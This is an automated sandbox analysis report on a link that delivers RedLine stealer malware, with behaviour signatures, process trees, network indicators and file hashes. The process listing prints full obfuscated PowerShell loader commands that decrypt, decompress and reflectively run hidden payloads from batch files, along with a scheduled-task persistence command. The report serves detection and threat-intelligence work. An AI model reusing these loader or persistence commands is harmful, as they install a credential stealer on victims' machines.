Analysis Overview
Threat Level: Known bad
The file https://clck.ru/3AmuGC was found to be: Known bad.
Malicious Activity Summary
RedLine payload
RedLine
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Drops file in Program Files directory
Suspicious use of WriteProcessMemory
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 14:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 14:24
Reported
2024-05-22 14:26
Platform
win10v2004-20240508-en
Max time kernel
104s
Max time network
105s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sxsczs = "C:\\Program Files\\- Windows.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\- Windows.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\nurik.new.bat:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://clck.ru/3AmuGC"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://clck.ru/3AmuGC
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.0.948761258\124717945" -parentBuildID 20230214051806 -prefsHandle 1808 -prefMapHandle 1788 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {060dfd9d-7348-4cea-8315-888575530815} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 1892 2447fcb9258 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.1.1703607064\1219344643" -parentBuildID 20230214051806 -prefsHandle 2476 -prefMapHandle 2472 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60664a33-bf16-43da-8f1c-b5e3e24e03dc} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 2488 24400191858 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.2.708460020\2072096402" -childID 1 -isForBrowser -prefsHandle 2992 -prefMapHandle 2988 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {93b4af89-37f4-476b-ad70-6d4420320797} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3000 24402b3ac58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.3.1478035860\47476394" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7760548-6713-45a3-a6c3-9137a4bf946c} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3680 244046f8558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.4.1731765788\190644778" -childID 3 -isForBrowser -prefsHandle 5200 -prefMapHandle 5196 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b66985a-32c3-4574-a881-7eeca3a3fffd} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5212 24405c54658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.5.1435030502\2082438215" -childID 4 -isForBrowser -prefsHandle 5396 -prefMapHandle 5392 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd839d70-d97d-4d6a-880a-f0bf98104349} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5404 24405ccce58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.6.1430726149\1216636621" -childID 5 -isForBrowser -prefsHandle 5532 -prefMapHandle 5540 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8795af3-8c5c-4548-ad47-cc78cd8eeac0} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5524 24405ccbc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.7.526838876\820828326" -childID 6 -isForBrowser -prefsHandle 3024 -prefMapHandle 3012 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca9f24db-5b7d-4bff-9eb7-088c0bdd6a99} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3112 24402b3a358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.8.2086656866\209819466" -childID 7 -isForBrowser -prefsHandle 6032 -prefMapHandle 3004 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {471c0c77-4a45-4bb2-b251-bfd5d7cfe99c} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 6004 24405ccb058 tab
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x514 0x320
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\nurik.new.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\nurik.new.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P18ifcCBzSiyBMZ7t/92DzfEEOiWB3GmB8u/Mgq96gE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XtxZehJC17SekGwMyNi97g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ILhZH=New-Object System.IO.MemoryStream(,$param_var); $qnbTK=New-Object System.IO.MemoryStream; $mNcWm=New-Object System.IO.Compression.GZipStream($ILhZH, [IO.Compression.CompressionMode]::Decompress); $mNcWm.CopyTo($qnbTK); $mNcWm.Dispose(); $ILhZH.Dispose(); $qnbTK.Dispose(); $qnbTK.ToArray();}function execute_function($param_var,$param2_var){ $RQKZp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BSkcv=$RQKZp.EntryPoint; $BSkcv.Invoke($null, $param2_var);}$VBZKk = 'C:\Users\Admin\Desktop\nurik.new.bat';$host.UI.RawUI.WindowTitle = $VBZKk;$VlTIu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VBZKk).Split([Environment]::NewLine);foreach ($eCJBm in $VlTIu) { if ($eCJBm.StartsWith(':: ')) { $NXiAz=$eCJBm.Substring(3); break; }}$payloads_var=[string[]]$NXiAz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\build.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Client.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BTcwzASLmoJ1ZL5KXzMu6IXsKQtggQBLKxtGQGMVivg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IBdf9vHDF4tEqjyQFw5gmw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oeZpq=New-Object System.IO.MemoryStream(,$param_var); $LpLBA=New-Object System.IO.MemoryStream; $yGtlM=New-Object System.IO.Compression.GZipStream($oeZpq, [IO.Compression.CompressionMode]::Decompress); $yGtlM.CopyTo($LpLBA); $yGtlM.Dispose(); $oeZpq.Dispose(); $LpLBA.Dispose(); $LpLBA.ToArray();}function execute_function($param_var,$param2_var){ $ioASE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AYHvj=$ioASE.EntryPoint; $AYHvj.Invoke($null, $param2_var);}$uUZMh = 'C:\Users\Admin\AppData\Local\Temp\build.bat';$host.UI.RawUI.WindowTitle = $uUZMh;$VBUID=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uUZMh).Split([Environment]::NewLine);foreach ($iadWj in $VBUID) { if ($iadWj.StartsWith(':: ')) { $IczyE=$iadWj.Substring(3); break; }}$payloads_var=[string[]]$IczyE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bOD4h9qfBjd+kzpHQzYVb/xtS9DlFXtyObsrSvfEJ2M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K0AyqGjRg+qdDkB+SoyHFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Isgcp=New-Object System.IO.MemoryStream(,$param_var); $CsNhz=New-Object System.IO.MemoryStream; $MqzLV=New-Object System.IO.Compression.GZipStream($Isgcp, [IO.Compression.CompressionMode]::Decompress); $MqzLV.CopyTo($CsNhz); $MqzLV.Dispose(); $Isgcp.Dispose(); $CsNhz.Dispose(); $CsNhz.ToArray();}function execute_function($param_var,$param2_var){ $NyVPO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BQjsX=$NyVPO.EntryPoint; $BQjsX.Invoke($null, $param2_var);}$NxkMh = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$host.UI.RawUI.WindowTitle = $NxkMh;$FDOzr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NxkMh).Split([Environment]::NewLine);foreach ($CzgRn in $FDOzr) { if ($CzgRn.StartsWith(':: ')) { $TZczo=$CzgRn.Substring(3); break; }}$payloads_var=[string[]]$TZczo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SYSTEM32\CMD.exe
"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "cmd" /tr "C:\Program Files\- Windows.exe" & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "cmd" /tr "C:\Program Files\- Windows.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:52806 | tcp | |
| US | 8.8.8.8:53 | clck.ru | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| US | 8.8.8.8:53 | clck.ru | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | clck.ru | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | 221.204.180.213.in-addr.arpa | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | sba.yandex.ru | udp |
| US | 44.230.111.112:443 | shavar.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.111.230.44.in-addr.arpa | udp |
| N/A | 127.0.0.1:52814 | tcp | |
| RU | 77.88.21.232:443 | sba.yandex.ru | tcp |
| US | 8.8.8.8:53 | sba.yandex.net | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.144.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sba.yandex.net | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| NL | 66.203.127.13:443 | eu.static.mega.co.nz | tcp |
| NL | 66.203.127.13:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.11:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.11:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | lu.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | lu.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | 13.127.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.11:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.11:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.125.203.66.in-addr.arpa | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | gfs270n074.userstorage.mega.co.nz | udp |
| LU | 89.44.168.241:443 | gfs270n074.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.241:443 | gfs270n074.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.241:443 | gfs270n074.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.241:443 | gfs270n074.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | gfs270n074.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs270n074.userstorage.mega.co.nz | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | 241.168.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| SE | 193.233.255.34:1111 | tcp | |
| US | 8.8.8.8:53 | 34.255.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| SE | 193.233.255.34:3765 | tcp | |
| SE | 193.233.255.34:3765 | tcp | |
| SE | 193.233.255.34:3765 | tcp | |
| SE | 193.233.255.34:3765 | tcp | |
| SE | 193.233.255.34:3765 | tcp | |
| SE | 193.233.255.34:3765 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| SE | 193.233.255.34:3765 | tcp | |
| SE | 193.233.255.34:3765 | tcp |
Files
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afevplna.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 5cd2849d1f86ad50c92e5ef41d170772 |
| SHA1 | 8a4e2046b8f4d7848ce4e1bf5e847cef91e7a6e1 |
| SHA256 | 356746d303c4f6450b6c5e20fa3a9f27198c0a93cafb24f7b683fe709f354104 |
| SHA512 | 7ffdbd297c4209919841d5d78bf4d8a0c0a1bd16e866876543dacfa49e161e2419156194f0d6be2ce90683d5ddb8f18a6f77f074ae65bb7a0286dcfa5d181412 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\storage\default\https+++mega.nz\cache\morgue\61\{0befcd81-5c12-403b-af3e-3010592f423d}.final
| MD5 | 3efa9abd92666265dd81c4f4311a96f9 |
| SHA1 | 41b6b716d67b93555e444cd453f3c6e3f8c9522c |
| SHA256 | 5066b1841e8877db31312ef3af86f9bc9234c95071119e025764f45241a4e2e7 |
| SHA512 | 5961950f077501608a0f2975e7f69c483eeacc4eec4ac77fd650cc1131609501f87819f93ed23aa508a90426156abf038a859fac4112d2d4435bbb634027cd6c |
C:\Users\Admin\Downloads\1WvvOC-U.bat.part
| MD5 | 35e845a0ecf75d9a598d0b58aa1a0174 |
| SHA1 | 231b7154e8acb666a8f592a48dc6f77f928e651b |
| SHA256 | a20474d0697013205e1fdb47517df7faa2bcfa06c447955654754d232f4179b9 |
